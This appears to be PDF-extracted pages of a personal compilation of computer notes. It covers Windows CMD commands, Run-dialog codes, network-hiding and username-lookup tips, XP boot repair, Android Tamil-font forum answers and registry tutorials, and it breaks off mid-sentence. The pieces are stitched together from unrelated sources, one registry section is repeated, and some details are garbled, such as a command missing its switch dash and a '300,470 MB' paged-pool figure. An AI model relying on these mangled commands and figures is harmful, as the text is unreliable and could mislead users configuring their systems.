r RASDIAL Manage RAS connections RASPHONE Manage RAS connections RECOVER Recover a damaged file from a defective disk. REG Registry: Read, Set, Export, Delete keys and values REGEDIT Import or export registry settings REGSVR32 Register or unregister a DLL REGINI Change Registry Permissions REM Record comments (remarks) in a batch file REN Rename a file or files REPLACE Replace or update one file with another RD Delete folder(s) RMTSHARE Share a folder or a printer ROBOCOPY Robust File and Folder Copy ROUTE Manipulate network routing tables RUN Start | RUN commands RUNAS Execute a program under a different user account RUNDLL32 Run a DLL command (add/remove print connections) s SC Service Control SCHTASKS Schedule a command to run at a specific time SCLIST Display NT Services SET Display, set, or remove environment variables SETLOCAL Control the visibility of environment variables SETX Set environment variables permanently SFC System File Checker SHARE List or edit a file share or print share SHIFT Shift the position of replaceable parameters in a batch file SHORTCUT Create a windows shortcut (.LNK file) SHOWGRPS List the NT Workgroups a user has joined SHOWMBRS List the Users who are members of a Workgroup
27

SHUTDOWN Shutdown the computer SLEEP Wait for x seconds SLMGR Software Licensing Management (Vista/2008) SOON Schedule a command to run in the near future SORT Sort input START Start a program or command in a separate window SU Switch User SUBINACL Edit file and folder Permissions, Ownership and Domain SUBST Associate a path with a drive letter SYSTEMINFO List system configuration t TASKLIST List running applications and services TASKKILL Remove a running process from memory TIME Display or set the system time TIMEOUT Delay processing of a batch file TITLE Set the window title for a CMD.EXE session TLIST Task list with full path TOUCH Change file timestamps TRACERT Trace route to a remote host TREE Graphical display of folder structure TSSHUTDN Remotely shut down or reboot a terminal server TYPE Display the contents of a text file TypePerf Write performance data to a log file u USRSTAT List domain usernames and last login v VER Display version information VERIFY Verify that files have been saved VOL Display a disk label w WAITFOR Wait for or send a signal WHERE Locate and display files in a directory tree WHOAMI Output the current UserName and domain WINDIFF Compare the contents of two files or sets of files
28

WINMSDP WINRM WINRS WMIC WUAUCLT x XCACLS XCOPY ::

Windows system report Windows Remote Management Windows Remote Shell WMI Commands Windows Update Change file and folder permissions Copy files and folders Comment / Remark

Commands marked are Internal commands only available within the CMD shell. All other commands (not marked with ) are external commands which may be used under the CMD shell, PowerShell, or directly from START-RUN.

Finished

Ii performed the following Steps but the modify key value reverts back to 0. Go to Start --> Run, then type Regedit 2. Navigate to the registry folder HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVersion\Explorer\Advanced\Folder\Hidden\SHO WALL 3. Find a key called CheckedValue. 4. Double Click CheckedValue key and modify it to 1. This is to show all the hidden files.) Suggest me step for further.

how To Hide Yourself From Network Users!, And give access to only specific users! written by Madhukara H at June 2, 2007

How to Hide in the (Network) Neighborhood

29

Don't want your XP computer to show up in the network browse list (Network Neighborhood/My Network Places) to other users on your network? One way to accomplish that is to disable file sharing. To do this, click Start, right click My Network Places and select Properties. Right click your local area connection and click Properties. Uncheck the box that says File and Printer Sharing for Microsoft Networks. Click OK.

But what if you want to be able to share folders with some users; you just don't want everyone on the network to see your computer's shares? There's a way:

Click Start and select Run. In the Run box, type net config server /hidden:yes Click OK. Now others who know the UNC path (\\computer name\share name) can connect to your computer's shares from the Run box, but it won't show up in the network browse list. How to lookup a user name and machine name using an IP address (on windows)

If you need to find a username but only have an ip address, if you use active directory (AD) then you can use the following method to find out the username: At the command prompt enter the following command: nbtstat a ipaddress Where ipaddress is the ip address. This will list the machine name using that ip address. Then run the following command:
30

net view /domain:ad > somefile.txt Where ad is the name of the domain you want to search and somefile.txt is the name of the file to contain the output. This will generate a list of every machine and who is logged in. Open the output file and search for the machine name determined in step 1 (the username will be listed next to this).

HTH

if you are using webview, place the your font file 'tamilfont.ttf' in the assets folder. and the java code will be similar to this. notice the font is applied in the css data = "<html><head><style>@font-face {font-family: 'tamilfont';src: url('file:///android_asset/tamilfont.ttf');} h1 { font-family: 'tamilfont'; } </style></head><body> <h1> !</h1> </body></html>"; WebView wv = (WebView)findViewById(R.id.webview); wv.loadDataWithBaseURL(null, data, "text/html", "UTF-8", null);

this approach does not work in android 2.0 and 2.1.link|improve this answer answered Apr 18 '11 at 10:23

Sam Quest 2,2611414

hi i am using json and stored as string tamil Apr 19 '11 at 12:47

31

what is your output control to display? WebView / TextView ... Sam Quest Apr 20 '11 at 5:14 @PM - Paresh Mayani: could you kindly point me where 'he' has mentioned webview. i presume that 'he' is 'me'. ;) Sam Quest Jul 1 '11 at 4:44

feedback

up vote 0 down vote Step 1: Download a tamil font .ttf file. (For example say kanchi.ttf).

Step 2: Now create a directory "fonts" in your assets folder in the android project.

Step 3: Now copy the kanchi.ttf file into assets/fonts folder in you Android project.

Step 4: Add these lines to your onCreate() protected static Typeface tamil = null; tamil= Typeface.createFromAsset(getAssets(),"fonts/kanchi.ttf");

Step 5: Now provide this typeface to your TextView you want. textview= (TextView) findViewById(R.id.tipstext);

32

textview.setTypeface(tamil); textview.setTextSize(20); textview.setText( "nkZk;");link|improve this answer 7:21 answered Jul 1 '11 at

Andro Selva 3,9583825

hi thanks for ur help.i have another one doubt here i want to display like " : English" how to set this string in textview tamil Jul 7 '11 at 6:11 I am not sure. But it's better if you use two textview for this type. Andro Selva Jul 7 '11 at 6:14

feedback

up vote 0 down vote check this, there is something going on about tamil unicode for android as inbuild

http://xkrishx.wordpress.com/2011/07/30/tamil-unicode-font-forandroid/link|improve this answer

33

Run Command Codes: 1. Accessibility Controls - access.cpl 2. Accessibility Wizard - accwiz 3. Add Hardware Wizard - hdwwiz.cpl 4. Add/Remove Programs - appwiz.cpl 5. Administrative Tools - control admintools 6. Automatic Updates - wuaucpl.cpl 7. Bluetooth Transfer Wizard - fsquirt 8. Calculator - calc 9. Certificate Manager - certmgr.msc 10. Character Map - charmap 11. Check Disk Utility - chkdsk 12. Clipboard Viewer - clipbrd 13. Command Prompt - cmd 14. Component Services - dcomcnfg 15. Computer Management - compmgmt.msc 16. Control Panel - control 17. Date and Time Properties - timedate.cpl 18. DDE Shares - ddeshare 19. Device Manager - devmgmt.msc 20. Direct X Troubleshooter - dxdiag

34

21. Disk Cleanup Utility - cleanmgr 22. Disk Defragment - dfrg.msc 23. Disk Management - diskmgmt.msc 24. Disk Partition Manager - diskpart 25. Display Properties - control desktop 26. Display Properties - desk.cpl 27. Dr. Watson System Troubleshooting Utility - drwtsn32 28. Driver Verifier Utility - verifier 29. Event Viewer - eventvwr.msc 30. Files and Settings Transfer Tool - migwiz 31. File Signature Verification Tool - sigverif 32. Findfast - findfast.cpl 33. Firefox - firefox 34. Folders Properties - control folders 35. Fonts - control fonts 36. Fonts Folder - fonts 37. Free Cell Card Game - freecell 38. Game Controllers - joy.cpl 39. Group Policy Editor (for xp professional) - gpedit.msc 40. Hearts Card Game - mshearts 41. Help and Support - helpctr

35

42. HyperTerminal - hypertrm 43. Iexpress Wizard - iexpress 44. Indexing Service - ciadv.msc 45. Internet Connection Wizard - icwconn1 46. Internet Explorer - iexplore 47. Internet Properties - inetcpl.cpl 48. Keyboard Properties - control keyboard 49. Local Security Settings - secpol.msc 50. Local Users and Groups - lusrmgr.msc 51. Logs You Out Of Windows - logoff 52. Malicious Software Removal Tool - mrt 53. Microsoft Chat - winchat 54. Microsoft Movie Maker - moviemk 55. Microsoft Paint - mspaint 56. Microsoft Syncronization Tool - mobsync 57. Minesweeper Game - winmine 58. Mouse Properties - control mouse 59. Mouse Properties - main.cpl 60. Netmeeting - conf 61. Network Connections - control netconnections 62. Network Connections - ncpa.cpl

36

63. Network Setup Wizard - netsetup.cpl 64. Notepad notepad 65. Object Packager - packager 66. ODBC Data Source Administrator - odbccp32.cpl 67. On Screen Keyboard - osk 68. Outlook Express - msimn 69. Paint - pbrush 70. Password Properties - password.cpl 71. Performance Monitor - perfmon.msc 72. Performance Monitor - perfmon 73. Phone and Modem Options - telephon.cpl 74. Phone Dialer - dialer 75. Pinball Game - pinball 76. Power Configuration - powercfg.cpl 77. Printers and Faxes - control printers 78. Printers Folder - printers 79. Regional Settings - intl.cpl 80. Registry Editor - regedit 81. Registry Editor - regedit32 82. Remote Access Phonebook - rasphone 83. Remote Desktop - mstsc

37

84. Removable Storage - ntmsmgr.msc 85. Removable Storage Operator Requests - ntmsoprq.msc 86. Resultant Set of Policy (for xp professional) - rsop.msc 87. Scanners and Cameras - sticpl.cpl 88. Scheduled Tasks - control schedtasks 89. Security Center - wscui.cpl 90. Services - services.msc 91. Shared Folders - fsmgmt.msc 92. Shuts Down Windows - shutdown 93. Sounds and Audio - mmsys.cpl 94. Spider Solitare Card Game - spider 95. SQL Client Configuration - cliconfg 96. System Configuration Editor - sysedit 97. System Configuration Utility - msconfig 98. System Information - msinfo32 99. System Properties - sysdm.cpl 100. Task Manager - taskmgr 101. TCP Tester - tcptest 102. Telnet Client - telnet 103. User Account Management - nusrmgr.cpl 104. Utility Manager - utilman

38

105. Windows Address Book - wab 106. Windows Address Book Import Utility - wabmig 107. Windows Explorer - explorer 108. Windows Firewall - firewall.cpl 109. Windows Magnifier - magnify 110. Windows Management Infrastructure - wmimgmt.msc 111. Windows Media Player - wmplayer 112. Windows Messenger - msmsgs 113. Windows System Security Tool - syskey 114. Windows Update Launches - wupdmgr 115. Windows Version - winver 116. Windows XP Tour Wizard - tourstart 117. Wordpad write Windows XP users 1. 2. 3. 4. Insert the Windows XP bootable CD into the computer. When prompted to press any key to boot from the CD, press any key. Once in the Windows XP setup menu press the "R" key to repair Windows. Log into your Windows installation by pressing the "1" key and pressing enter. 5. You will then be prompted for your administrator password, enter that password. 6. Copy the below two files to the root directory of the primary hard disk. In the below example we are copying these files from the CD-ROM drive letter, which in this case is "e." This letter may be different on your computer. copy e:\i386\ntldr c:\ copy e:\i386\ntdetect.com c:\
39

7. Once both of these files have been successfully copied, remove the CD from the computer and reboot.

Windows Registry Tutorial Overview The Registry is a database used to store settings and options for the 32 bit versions of Microsoft Windows including Windows 95, 98, ME and NT/2000. It contains information and settings for all the hardware, software, users, and preferences of the PC. Whenever a user makes changes to a Control Panel settings, or File Associations, System Policies, or installed software, the changes are reflected and stored in the Registry.

The physical files that make up the registry are stored differently depending on your version of Windows; under Windows 95 & 98 it is contained in two hidden files in your Windows directory, called USER.DAT and SYSTEM.DAT, for Windows Me there is an additional CLASSES.DAT file, while under Windows NT/2000 the files are contained seperately in the %SystemRoot%\System32\Config directory. You can not edit these files directly, you must use a tool commonly known as a "Registry Editor" to make any changes (using registry editors will be discussed later in the article). The Structure of the Registry

The Registry has a hierarchal structure, although it looks complicated the structure is similar to the directory structure on your hard disk, with Regedit
40

being similar to Windows Explorer. Each main branch (denoted by a folder icon in the Registry Editor, see left) is called a Hive, and Hives contains Keys. Each key can contain other keys (sometimes referred to as sub-keys), as well as Values. The values contain the actual information stored in the Registry. There are three types of values; String, Binary, and DWORD - the use of these depends upon the context. There are six main branches, each containing a specific portion of the information stored in the Registry. They are as follows: HKEY_CLASSES_ROOT - This branch contains all of your file association mappings to support the drag-and-drop feature, OLE information, Windows shortcuts, and core aspects of the Windows user interface. HKEY_CURRENT_USER - This branch links to the section of HKEY_USERS appropriate for the user currently logged onto the PC and contains information such as logon names, desktop settings, and Start menu settings. HKEY_LOCAL_MACHINE - This branch contains computer specific information about the type of hardware, software, and other preferences on a given PC, this information is used for all users who log onto this computer. HKEY_USERS - This branch contains individual preferences for each user of the computer, each user is represented by a SID sub-key located under the main branch. HKEY_CURRENT_CONFIG - This branch links to the section of HKEY_LOCAL_MACHINE appropriate for the current hardware configuration. HKEY_DYN_DATA - This branch points to the part of HKEY_LOCAL_MACHINE, for use with the Plug-&-Play features of Windows, this section is dymanic and will change as devices are added and removed from the system. Each registry value is stored as one of five main data types: REG_BINARY - This type stores the value as raw binary data. Most hardware component information is stored as binary data, and can be displayed in an editor in hexadecimal format.
41

REG_DWORD - This type represents the data by a four byte number and is commonly used for boolean values, such as "0" is disabled and "1" is enabled. Additionally many parameters for device driver and services are this type, and can be displayed in REGEDT32 in binary, hexadecimal and decimal format, or in REGEDIT in hexadecimal and decimal format. REG_EXPAND_SZ - This type is an expandable data string that is string containing a variable to be replaced when called by an application. For example, for the following value, the string "%SystemRoot%" will replaced by the actual location of the directory containing the Windows NT system files. (This type is only available using an advanced registry editor such as REGEDT32) REG_MULTI_SZ - This type is a multiple string used to represent values that contain lists or multiple values, each entry is separated by a NULL character. (This type is only available using an advanced registry editor such as REGEDT32) REG_SZ - This type is a standard string, used to represent human readable text values. Other data types not available through the standard registry editors include: REG_DWORD_LITTLE_ENDIAN - A 32-bit number in little-endian format. REG_DWORD_BIG_ENDIAN - A 32-bit number in big-endian format. REG_LINK - A Unicode symbolic link. Used internally; applications should not use this type. REG_NONE - No defined value type. REG_QWORD - A 64-bit number. REG_QWORD_LITTLE_ENDIAN - A 64-bit number in little-endian format. REG_RESOURCE_LIST - A device-driver resource list. Editing the Registry
42

The Registry Editor (REGEDIT.EXE) is included with most version of Windows (although you won't find it on the Start Menu) it enables you to view, search and edit the data within the Registry. There are several methods for starting the Registry Editor, the simplest is to click on the Start button, then select Run, and in the Open box type "regedit", and if the Registry Editor is installed it should now open and look like the image below. An alternative Registry Editor (REGEDT32.EXE) is available for use with Windows NT/2000, it includes some additional features not found in the standard version, including; the ability to view and modify security permissions, and being able to create and modify the extended string values REG_EXPAND_SZ & REG_MULTI_SZ.

Create a Shortcut to Regedit This can be done by simply right-clicking on a blank area of your desktop, selecting New, then Shortcut, then in the Command line box enter "regedit.exe" and click Next, enter a friendly name (e.g. 'Registry Editor') then click Finish and now you can double click on the new icon to launch the Registry Editor. Using Regedit to modify your Registry Once you have started the Regedit you will notice that on the left side there is a tree with folders, and on the right the contents (values) of the currently selected folder.

43

Like Windows explorer, to expand a certain branch (see the structure of the registry section), click on the plus sign [+] to the left of any folder, or just double-click on the folder. To display the contents of a key (folder), just click the desired key, and look at the values listed on the right side. You can add a new key or value by selecting New from the Edit menu, or by rightclicking your mouse. And you can rename any value and almost any key with the same method used to rename files; right-click on an object and click rename, or click on it twice (slowly), or just press F2 on the keyboard. Lastly, you can delete a key or value by clicking on it, and pressing Delete on the keyboard, or by right-clicking on it, and choosing Delete. Note: it is always a good idea to backup your registry before making any changes to it. It can be intimidating to a new user, and there is always the possibility of changing or deleting a critical setting causing you to have to reinstall the whole operating system. It's much better to be safe than sorry! Importing and Exporting Registry Settings A great feature of the Registry Editor is it's ability to import and export registry settings to a text file, this text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad, to do this using the Registry Editor select a key, then from the "Registry" menu choose "Export Registry File...", choose a filename and save. If you open this file in notepad you will see a file similar to the example below: REGEDIT4 [HKEY_LOCAL_MACHINE\SYSTEM\Setup] "SetupType"=dword:00000000 "CmdLine"="setup -newsetup" "SystemPrefix"=hex:c5,0b,00,00,00,40,36,02

The layout is quite simple, REGEDIT4 indicated the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicated the key the values
44

are from, "SetupType"=dword:00000000 are the values themselves the portion after the "=" will vary depending on the type of value they are; DWORD, String or Binary. So by simply editing this file to make the changes you want, it can then be easily distributed and all that need to be done is to double-click, or choose "Import" from the Registry menu, for the settings to be added to the system Registry. Deleting keys or values using a REG file It is also possible to delete keys and values using REG files. To delete a key start by using the same format as the the REG file above, but place a "-" symbol in front of the key name you want to delete. For example to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the reg file would look like this: REGEDIT4 [-HKEY_LOCAL_MACHINE\SYSTEM\Setup] The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value "SetupType" the file would look like: REGEDIT4 [HKEY_LOCAL_MACHINE\SYSTEM\Setup] "SetupType"=Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first. Regedit Command Line Options Regedit has a number of command line options to help automate it's use in either batch files or from the command prompt. Listed below are some of the options, please note the some of the functions are operating system specific.

45

regedit.exe [options] [filename] [regpath] [filename] Import .reg file into the registry /s [filename] Silent import, i.e. hide confirmation box when importing files /e [filename] [regpath] Export the registry to [filename] starting at [regpath] e.g. regedit /e file.reg HKEY_USERS\.DEFAULT /L:system Specify the location of the system.dat to use /R:user Specify the location of the user.dat to use C [filename] Compress (Windows 98) /D [regpath] Delete the specified key (Windows 98) Maintaining the Registry On Windows NT you can use either the "Last Known Good" option or RDISK to restore to registry to a stable working configuration. How can I clean out old data from the Registry? Although it's possible to manually go through the Registry and delete unwanted entries, Microsoft provides a tool to automate the process, the program is called RegClean. RegClean analyzes Windows Registry keys stored in a common location in the Windows Registry. It finds keys that contain erroneous values, it

46

removes them from the Windows Registry after having recording those entries in the Undo.Reg file. Importing and Exporting Registry Settings A great feature of the Registry Editor is it's ability to import and export registry settings to a text file, this text file, identified by the .REG extension, can then be saved or shared with other people to easily modify local registry settings. You can see the layout of these text files by simply exporting a key to a file and opening it in Notepad, to do this using the Registry Editor select a key, then from the "Registry" menu choose "Export Registry File...", choose a filename and save. If you open this file in notepad you will see a file similar to the example below: REGEDIT4 [HKEY_LOCAL_MACHINE\SYSTEM\Setup] "SetupType"=dword:00000000 "CmdLine"="setup -newsetup" "SystemPrefix"=hex:c5,0b,00,00,00,40,36,02

The layout is quite simple, REGEDIT4 indicated the file type and version, [HKEY_LOCAL_MACHINE\SYSTEM\Setup] indicated the key the values are from, "SetupType"=dword:00000000 are the values themselves the portion after the "=" will vary depending on the type of value they are; DWORD, String or Binary.

So by simply editing this file to make the changes you want, it can then be easily distributed and all that need to be done is to double-click, or choose "Import" from the Registry menu, for the settings to be added to the system Registry.

47

Deleting keys or values using a REG file It is also possible to delete keys and values using REG files. To delete a key start by using the same format as the the REG file above, but place a "-" symbol in front of the key name you want to delete. For example to delete the [HKEY_LOCAL_MACHINE\SYSTEM\Setup] key the reg file would look like this:

REGEDIT4

[-HKEY_LOCAL_MACHINE\SYSTEM\Setup]

The format used to delete individual values is similar, but instead of a minus sign in front of the whole key, place it after the equal sign of the value. For example, to delete the value "SetupType" the file would look like:

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\Setup] "SetupType"=-

Use this feature with care, as deleting the wrong key or value could cause major problems within the registry, so remember to always make a backup first.

Regedit Command Line Options

48

Regedit has a number of command line options to help automate it's use in either batch files or from the command prompt. Listed below are some of the options, please note the some of the functions are operating system specific. regedit.exe [options] [filename] [regpath] [filename] Import .reg file into the registry /s [filename] Silent import, i.e. hide confirmation box when importing files /e [filename] [regpath] [regpath] Export the registry to [filename] starting at

e.g. regedit /e file.reg HKEY_USERS\.DEFAULT /L:system /R:user Specify the location of the system.dat to use Specify the location of the user.dat to use Compress (Windows 98)

/C [filename]

/D [regpath] Delete the specified key (Windows 98)

The expected skills:

Able to understand Windows Registry.

Able to understand and use functions to manipulate Windows Registry.

49

Able to gather and understand the required information in order to use those functions. Introduction

The registry is a system-defined database in which applications and system components store and retrieve configuration data. The data stored in the registry varies according to the version of Microsoft Windows. Applications use the registry API to retrieve, modify, or delete registry data. You should not edit registry data that does not belong to your application unless it is absolutely necessary. If there is an error in the registry, your system may not function properly. If this happens, you can restore the registry to the state it was in when you last started the computer successfully.

Structure of the Registry

The registry stores data in a tree format. Each node in the tree is called a key. Each key can contain both subkeys and data entries called values. Sometimes, the presence of a key is all the data that an application requires; other times, an application opens a key and uses the values associated with the key. A key can have any number of values, and the values can be in any form. Each key has a name consisting of one or more printable characters. Key names cannot include a backslash (\), but any other printable or unprintable character can be used. The name of each subkey is unique with
50

respect to the key that is immediately above it in the hierarchy. Key names are not localized into other languages, although values may be. The following figure is an example registry key structure as displayed by the Registry Editor (regedit.exe). Figure 1: Registry Editor.

Each of the trees under My Computer is a key. The HKEY_LOCAL_MACHINE key has the following subkeys: HARDWARE, SAM, SECURITY, SOFTWARE, and SYSTEM. Each value consists of a value name and its associated data, if any. MaxObjectNumber and VgaCompatible are values under the DEVICEMAP\VIDEO subkey that contain data. Registry Storage Space

51

Although there are few technical limits to the type and size of data an application can store in the registry, certain practical guidelines exist to promote system efficiency. An application should store configuration and initialization data in the registry, and store other kinds of data elsewhere. Generally, data consisting of more than one or two kilobytes (KB) should be stored as a file and referred to by using a key in the registry rather than being stored as a value. Instead of duplicating large pieces of data in the registry, an application should save the data as a file and refer to the file. Executable binary code should never be stored in the registry. A value entry uses much less registry space than a key. To save space, an application should group similar data together as a structure and store the structure as a value rather than storing each of the structure members as a separate key. Storing the data in binary form allows an application to store data in one value that would otherwise be made up of several incompatible types. Windows Server 2003 and Windows XP Views of the registry files are mapped in the computer cache address space. Therefore, regardless of the size of the registry data, it is not charged more than 4 megabytes (MB). There are no longer any explicit limits on the total amount of space that may be consumed by hives in paged pool memory, and in disk space. The size of the system hive is limited only by physical memory. Windows 2000 and Windows NT Registry data is stored in the paged pool, an area of physical memory used for system data that can be written to disk when not in use. The RegistrySizeLimit value establishes the maximum amount of paged pool that can be consumed by registry data from all applications. This value is located in the following registry key: HKEY_LOCAL_MACHINE System CurrentControlSet Control

52

By default, the registry size limit is 25 percent of the paged pool. The default size of the paged pool is 32 MB, so this is 8 MB. The system ensures that the minimum value of RegistrySizeLimit is 4 MB and the maximum is approximately 80 percent of the PagedPoolSize value. If the value of this entry is greater than 80 percent of the size of the paged pool, the system sets the maximum size of the registry to 80 percent of the size of the paged pool. This prevents the registry from consuming space needed by processes. Note that setting this value does not allocate space in the paged pool, nor does it assure that the space will be available if needed. The paged pool size is determined by the PagedPoolSize value in the following registry key: HKEY_LOCAL_MACHINE System CurrentControlSet Control SessionManager MemoryManagement Windows 2000: The maximum paged pool is approximately 300,470 MB so the registry size limit is 240-376 MB. However, if the /3GB switch is used, the maximum paged pool size is 192 MB, so the registry can be a maximum of 153.6 MB. Windows NT 4.0: The maximum paged pool size is 192 MB, so the registry size limit is 153.6 MB. Windows NT 3.51 and earlier: The maximum paged pool is 128 MB, so the registry size limit is 102 MB. Predefined Keys

An application must open a key before it can add data to the registry. To open a key, an application must supply a handle to another key in the
53

registry that is already open. The system defines predefined keys that are always open. Predefined keys help an application navigate in the registry and make it possible to develop tools that allow a system administrator to manipulate categories of data. Applications that add data to the registry should always work within the framework of predefined keys, so administrative tools can find and use the new data. An application can use handles to these keys as entry points to the registry. These handles are valid for all implementations of the registry, although the use of the handles may vary from platform to platform. In addition, other predefined handles have been defined for specific platforms. The following are handles to the predefined keys. Handle Description HKEY_CLASSES_ROOT Registry entries subordinate to this key define types (or classes) of documents and the properties associated with those types. Shell and COM applications use the information stored under this key. This key also provides backward compatibility with the Windows 3.1 registration database by storing information for DDE and OLE support. File viewers and user interface extensions store their OLE class identifiers in HKEY_CLASSES_ROOT, and in-process servers are registered in this key. This handle should not be used in a service or an application that impersonates different users. HKEY_CURRENT_CONFIG Contains information about the current hardware profile of the local computer system. The information under HKEY_CURRENT_CONFIG describes only the differences between the current hardware configuration and the standard configuration. Information about the standard hardware configuration is stored under the Software and System keys of HKEY_LOCAL_MACHINE. HKEY_CURRENT_CONFIG is an alias for HKEY_LOCAL_MACHINE\System\CurrentControlSet\Hardware Profiles\Current.
54

Windows NT 3.51 and earlier: This key does not exist. HKEY_CURRENT_USER Registry entries subordinate to this key define the preferences of the current user. These preferences include the settings of environment variables, data about program groups, colors, printers, network connections, and application preferences. This key makes it easier to establish the current user's settings; the key maps to the current user's branch in HKEY_USERS. In HKEY_CURRENT_USER, software vendors store the current user-specific preferences to be used within their applications. Microsoft, for example, creates the HKEY_CURRENT_USER\Software\Microsoft key for its applications to use, with each application creating its own subkey under the Microsoft key. This handle should not be used in a service or an application that impersonates different users. Instead, call the RegOpenCurrentUser() function. HKEY_DYN_DATA Windows Me/98/95: Registry entries subordinate to this key allow you to collect performance data. HKEY_LOCAL_MACHINE Registry entries subordinate to this key define the physical state of the computer, including data about the bus type, system memory, and installed hardware and software. It contains subkeys that hold current configuration data, including Plug and Play information (the Enum branch, which includes a complete list of all hardware that has ever been on the system), network logon preferences, network security information, software-related information (such as server names and the location of the server), and other system information. HKEY_PERFORMANCE_DATA Registry entries subordinate to this key allow you to access performance data. The data is not actually stored in the registry; the registry functions cause the system to collect the data from its source. Windows Me/98/95: This key is not supported. HKEY_PERFORMANCE_NLSTEXT
55

Registry entries subordinate to this key reference the text strings that describe counters in the local language of the area in which the computer system is running. These entries are not available to Regedit.exe and Regedt32.exe. Windows 2000/NT, Windows Me/98/95: This key is not supported. HKEY_PERFORMANCE_TEXT Registry entries subordinate to this key reference the text strings that describe counters in US English. These entries are not available to Regedit.exe and Regedt32.exe. For Windows 2000/NT, Windows Me/98/95: This key is not supported. HKEY_USERS Registry entries subordinate to this key define the default user configuration for new users on the local computer and the user configuration for the current user. Table 1.

The RegOverridePredefKey() function enables you to map a predefined registry key to a specified key in the registry. For instance, a software installation program could remap a predefined key before installing a DLL component. This enables the installation program to easily examine the information that the DLL's installation procedure writes to the predefined key.

56

Figure 2: HKEY_CLASSES_ROOT registry key.

Figure 3: HKEY_CURRENT_USER registry key.

57

Figure 4: HKEY_LOCAL_MACHINE registry key.

Figure 5: HKEY_USERS registry key.

58

Figure 6: HKEY_CURRENT_CONFIG registry key. Registry Hives A hive is a group of keys, subkeys, and values in the registry that has a set of supporting files containing backups of its data. The setup phase of the Windows boot process automatically retrieves data from these supporting files. You can also retrieve data manually using the Import Registry File menu item of the Registry Editor (Regedit.exe). When you shut down Windows, the operating system automatically writes the hive data to the supporting files. You can also back up the hive data manually using the Export Registry File menu item of the Registry Editor.

The supporting files for all hives except HKEY_CURRENT_USER are in the %SystemRoot%\System32\Config directory; the supporting files for HKEY_CURRENT_USER are in the %SystemRoot%\Documents and Settings\Username directory and for Windows NT it is in %SystemRoot%\Profiles\Username directory. The file name extensions of the files in these directories, and in some cases a lack of an extension, indicate the type of data they contain. The following table lists these extensions along with a description of the data in the file.
59

Figure 7: The C:\Documents and Settings\Johnny directory, user supporting

files. Figure 8: C:\WINDOWS\system32\config directory, supporting files for all hives.

60

Extension Description No extension A complete copy of the hive data. .alt A backup copy of the critical HKEY_LOCAL_MACHINE\System hive. Only the System key has an .alt file.

.log A transaction log of changes to the keys and value entries in the hive. .sav Copies of the hive files as they looked at the end of the text-mode stage in Setup. Setup has two stages: text mode and graphics mode. The hive is copied to a .sav file after the text-mode stage of setup to protect it from errors that might occur if the graphics-mode stage of setup fails. If setup fails during the graphics-mode stage, only the graphics-mode stage is repeated when the computer is restarted; the .sav file is used to restore the hive data. Table 2. The following table lists the standard hives and their supporting files. Registry hive Supporting files HKEY_CURRENT_CONFIG System, System.alt, System.log, System.sav

61

HKEY_CURRENT_USER Ntuser.dat, Ntuser.dat.log HKEY_LOCAL_MACHINE\SAM Sam, Sam.log, Sam.sav HKEY_LOCAL_MACHINE\Security Security, Security.log, Security.sav HKEY_LOCAL_MACHINE\Software Software, Software.log, Software.sav HKEY_LOCAL_MACHINE\System System, System.alt, System.log, System.sav HKEY_USERS\.DEFAULT Default, Default.log, Default.sav Table 3. Each time a new user logs on to a computer, a new hive is created for that user with a separate file for the user profile. This is called the user profile hive. A user's hive contains specific registry information pertaining to the user's application settings, desktop, environment, network connections, and printers. User profile hives are located under the HKEY_USERS key. The supporting file for the user profile hive for a particular user is located in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\ CurrentVersion\ProfileList\SID\ProfileImagePath, and is named Ntuser.dat. The value of ProfileImagePath is a binary representation of the directory name of the user's profile, which includes the user's name. Use the Registry Editor to display this binary value as a string.

62

Figure 9: User (Johnny) profile hives under ProfileList key.

Figure 10: Ntuser.dat, the supporting file for the user (Johnny) profile hive. Categories of Data Before putting data into the registry, an application should divide the data into two categories:
63

Computer-specific data and User-specific data. By making this distinction, an application can support multiple users, and yet locate user-specific data over a network and use that data in different locations, allowing location-independent user profile data. A user profile is a set of configuration data saved for every user. When the application is installed, it should record the computer-specific data under the HKEY_LOCAL_MACHINE key. In particular, it should create keys for the company name, product name, and version number, as shown in the following example: HKEY_LOCAL_MACHINE\Software\MyCompany\MyProduct\1.0 If the application supports COM, it should record that data under HKEY_LOCAL_MACHINE\Software\Classes. An application should record user-specific data under the HKEY_CURRENT_USER key, as shown in the following example: HKEY_CURRENT_USER\Software\MyCompany\MyProduct\1.0 Opening, Creating, and Closing Keys Before an application can add data to the registry, it must create or open a key. To create or open a key, an application always refers to the key as a subkey of a currently open key. The following predefined keys are always open: HKEY_LOCAL_MACHINE. HKEY_CLASSES_ROOT. HKEY_USERS and HKEY_CURRENT_USER. \An application uses the RegOpenKeyEx() function to open a key and the RegCreateKeyEx() function to create a key.

64

An application can use the RegCloseKey() function to close a key and write the data it contains into the registry. RegCloseKey() does not necessarily write the data to the registry before returning; it can take as much as several seconds for the cache to be flushed to the hard disk. If an application must explicitly write registry data to the hard disk, it can use the RegFlushKey() function. RegFlushKey(), however, uses many system resources and should be called only when absolutely necessary. Writing and Deleting Registry Data An application can use the RegSetValueEx() function to associate a value and its data with a key. To delete a value from a key, an application can use the RegDeleteValue() function. To delete a key, it can use the RegDeleteKey() function. A deleted key is not removed until the last handle to it has been closed. Subkeys and values cannot be created under a deleted key. It is not possible to lock a registry key during a write operation to synchronize access to the data. However, you can control access to a registry key using security attributes. Retrieving Data from the Registry To retrieve data from the registry, an application typically enumerates the subkeys of a key until it finds a particular one and then retrieves data from the value or values associated with it. An application can call the RegEnumKeyEx() function to enumerate the subkeys of a given key. To retrieve detailed data about a particular subkey, an application can call the RegQueryInfoKey() function. The RegGetKeySecurity() function retrieves a copy of the security descriptor protecting a key. An application can use the RegEnumValue() function to enumerate the values for a given key, and RegQueryValueEx() function to retrieve a particular value for a key. An application typically calls RegEnumValue() to determine the value names and then RegQueryValueEx() to retrieve the data for the names. The RegQueryMultipleValues() function retrieves the type and data for a list of value names associated with an open registry key. This function is useful for dynamic key providers because it assures consistency of data by retrieving multiple values in an atomic operation. Because other applications can change the data in a registry value 